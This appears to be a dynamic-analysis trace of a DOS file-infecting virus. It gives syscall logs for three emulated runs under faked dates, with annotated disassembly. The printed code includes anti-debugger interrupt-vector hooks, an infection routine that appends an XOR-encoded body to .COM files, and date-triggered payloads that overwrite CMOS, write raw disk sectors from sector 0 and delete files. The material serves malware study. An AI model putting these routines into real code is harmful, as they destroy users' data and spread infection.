0x12b28: jge 0x12b2d ; 25 or more -> return
0x12b2a: call 0x12b7e ; target is not listed in the excerpts shown here
0x12b2d: ret
0x12b2e: mov al, 0x25 ; routine called from 0x12b01 on 14 July: AL starts at 0x25
0x12b30: out 0x70, al ; port 0x70: CMOS/RTC index register
0x12b32: out 0x71, al ; port 0x71: CMOS/RTC data register, written with the index value
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30 ; repeats down to index 0x01; port I/O is not a DOS call, so expect no row for it in the syscall table
0x12b3a: ret
0x12b3b: mov ah, 0x19 ; INT 21h AH=19h: get current drive, returned in AL
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111 ; sector count (4369) for INT 26h
0x12b42: mov dx, 0 ; starting logical sector 0
0x12b45: int 0x26 ; DOS absolute disk write to drive AL; buffer DS:BX is not set in this excerpt
0x12b47: add sp, 2 ; INT 26h returns with the flags word still on the stack
0x12b4a: ret
0x12b4b: mov ah, 0x13 ; AH=13h is the DOS FCB delete function; the INT itself is past this excerpt
0x12b4d: push cs

{"DateBased":true,"Day":8,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:56.181454274Z 26 PC: 12a73 | Set disk transfer address
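2018-12-25T12:41:56.183965092Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input') [note: vector 1 is the CPU single-step trap; 'Character input' is the name of DOS function 01h, not of this interrupt]
2018-12-25T12:41:56.185415772Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input') [note: vector 3 is the breakpoint interrupt; 'Auxiliary input' is the name of DOS function 03h. Re-pointing vectors 1 and 3 is a common way to disturb a debugger]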
2018-12-25T12:41:56.186891988Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:56.19301909Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:56.206787735Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:56.2136028Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:56.215263337Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:56.2187391Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:56.222193848Z 66 PC: 12d8e | Move file pointer
; Append step of the infection routine: patch one byte, XOR the body, write 0x375 bytes, XOR back, close.
2018-12-25T12:41:56.224336034Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl ; DL comes from the Get time call traced on this line; target is likely the imm8 of the xor at 0x12db3 - TODO confirm bp
0x12d96: call 0x12dac ; first XOR pass, before the write
0x12d99: mov ah, 0x40 ; INT 21h AH=40h: write to file handle
0x12d9b: mov cx, 0x375 ; 0x375 = 885 bytes, the size the trace reports for this write
0x12d9e: lea dx, word ptr [bp + 0x106] ; buffer to write starts at bp+0x106
0x12da2: int 0x21
0x12da4: call 0x12dac ; second XOR pass over the same range undoes the first in memory
0x12da7: mov ah, 0x3e ; INT 21h AH=3Eh: close file handle
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120] ; XOR range starts 0x1a bytes into the write buffer
0x12db0: mov cx, 0x336 ; 0x336 = 822 bytes
0x12db3: xor byte ptr [si], 0 ; key operand reads 0 in this listing, which would leave the bytes unchanged
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di ; NOTE(review): bytes after the ret are probably data shown as instructions
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:56.227709187Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:56.246726307Z 62 PC: 12dab | Close file
2018-12-25T12:41:56.254855869Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.258326082Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.265037627Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.271431764Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.273804705Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.275119215Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.277601228Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.287151877Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.292882795Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.318767502Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.337414279Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.340020039Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.351819586Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.359349858Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.361381393Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.363096351Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.366145194Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.368328778Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.371019595Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.37941663Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.403268294Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.410418254Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.416671537Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.424236264Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.425837928Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.427468101Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.431359124Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.432983659Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.435554368Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.444903743Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.453049357Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.455850619Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.462973285Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.469627141Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.471042736Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.472755307Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.47568245Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.47707463Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.479484574Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.488526909Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.497030643Z 26 PC: 12aeb | Set disk transfer address
2018-12-25T12:41:56.498438467Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e
0x12b04: mov ah, 0x2a
0x12b06: int 0x21
0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
2018-12-25T12:41:56.501151729Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
2018-12-25T12:41:56.50340259Z 25 PC: 12b3f | Get default drive
2018-12-25T12:41:56.506492753Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
2018-12-25T12:41:56.509455283Z 19 PC: 12b55 | Delete file
2018-12-25T12:41:56.518268809Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
0x12b45: int 0x26
0x12b47: add sp, 2
0x12b4a: ret
0x12b4b: mov ah, 0x13
0x12b4d: push cs
2018-12-25T12:41:56.520291403Z 9 PC: 12b88 | Display string (Could not find end pointer)

{"DateBased":true,"Day":1,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:56.204911105Z 26 PC: 12a73 | Set disk transfer address
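2018-12-25T12:41:56.220185278Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input'; that name is INT 21h function 01h, whereas vector 01h is the CPU single-step trap)
2018-12-25T12:41:56.221508426Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input'; that name is INT 21h function 03h, whereas vector 03h is the breakpoint interrupt; replacing vectors 01h and 03h typically disrupts debuggers that rely on them)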
2018-12-25T12:41:56.222909719Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:56.229048972Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:56.236120041Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:56.242962218Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:56.244561093Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:56.247471923Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:56.258583144Z 66 PC: 12d8e | Move file pointer
2018-12-25T12:41:56.267549842Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl
0x12d96: call 0x12dac
0x12d99: mov ah, 0x40
0x12d9b: mov cx, 0x375
0x12d9e: lea dx, word ptr [bp + 0x106]
0x12da2: int 0x21
0x12da4: call 0x12dac
0x12da7: mov ah, 0x3e
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]
0x12db0: mov cx, 0x336
0x12db3: xor byte ptr [si], 0
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:56.270497852Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:56.284543631Z 62 PC: 12dab | Close file
2018-12-25T12:41:56.292541305Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.296387175Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.303039943Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.309404605Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.311838359Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.313655375Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.316505714Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.318489048Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.321411784Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.342892249Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.351050669Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.353580996Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.357617883Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.36427903Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.366622967Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.368281496Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.371086959Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.37391883Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.376766936Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.385018425Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.393448419Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.396985284Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.403780855Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.421128441Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.422622162Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.424058279Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.427815646Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.42940354Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.43205369Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.445766326Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.454015345Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.456814271Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.463770748Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.467702961Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.46870308Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.469801947Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.471891621Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.472987061Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.475299741Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.482125199Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.488421953Z 26 PC: 12aeb | Set disk transfer address
2018-12-25T12:41:56.489829952Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e
0x12b04: mov ah, 0x2a
0x12b06: int 0x21
0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
2018-12-25T12:41:56.492448941Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
2018-12-25T12:41:56.494525463Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
2018-12-25T12:41:56.496748878Z 19 PC: 12b55 | Delete file
2018-12-25T12:41:56.502651839Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
0x12b45: int 0x26
0x12b47: add sp, 2
0x12b4a: ret
0x12b4b: mov ah, 0x13
0x12b4d: push cs

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:56.239921682Z 26 PC: 12a73 | Set disk transfer address
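2018-12-25T12:41:56.241599393Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input'; that name is INT 21h function 01h, whereas vector 01h is the CPU single-step trap)
2018-12-25T12:41:56.243973268Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input'; that name is INT 21h function 03h, whereas vector 03h is the breakpoint interrupt; replacing vectors 01h and 03h typically disrupts debuggers that rely on them)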
2018-12-25T12:41:56.245158753Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:56.251886721Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:56.259747207Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:56.267202358Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:56.269107497Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:56.271670233Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:56.275138393Z 66 PC: 12d8e | Move file pointer
2018-12-25T12:41:56.277314955Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl
0x12d96: call 0x12dac
0x12d99: mov ah, 0x40
0x12d9b: mov cx, 0x375
0x12d9e: lea dx, word ptr [bp + 0x106]
0x12da2: int 0x21
0x12da4: call 0x12dac
0x12da7: mov ah, 0x3e
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]
0x12db0: mov cx, 0x336
0x12db3: xor byte ptr [si], 0
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:56.288872364Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:56.30477898Z 62 PC: 12dab | Close file
2018-12-25T12:41:56.315503396Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.318748272Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.326594374Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.333977742Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.335894981Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.33877933Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.341840225Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.343497585Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.34679588Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.356382241Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.367784252Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.372065596Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.379864781Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.387824292Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.390807203Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.392671376Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.39623457Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.400278108Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.404592488Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.415127647Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.426878339Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.430261194Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.438319886Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.446240207Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.449389399Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.451480826Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.456347742Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.459901804Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.462653189Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.471511031Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.481100517Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.484250154Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.492103691Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.501181896Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.503256383Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.505279683Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.509345369Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.512020101Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.515588847Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.527380453Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.538313983Z 26 PC: 12aeb | Set disk transfer address
2018-12-25T12:41:56.53959697Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e
0x12b04: mov ah, 0x2a
0x12b06: int 0x21
0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
2018-12-25T12:41:56.542013189Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
2018-12-25T12:41:56.545240686Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
2018-12-25T12:41:56.54804267Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
0x12b45: int 0x26
0x12b47: add sp, 2
0x12b4a: ret
0x12b4b: mov ah, 0x13
0x12b4d: push cs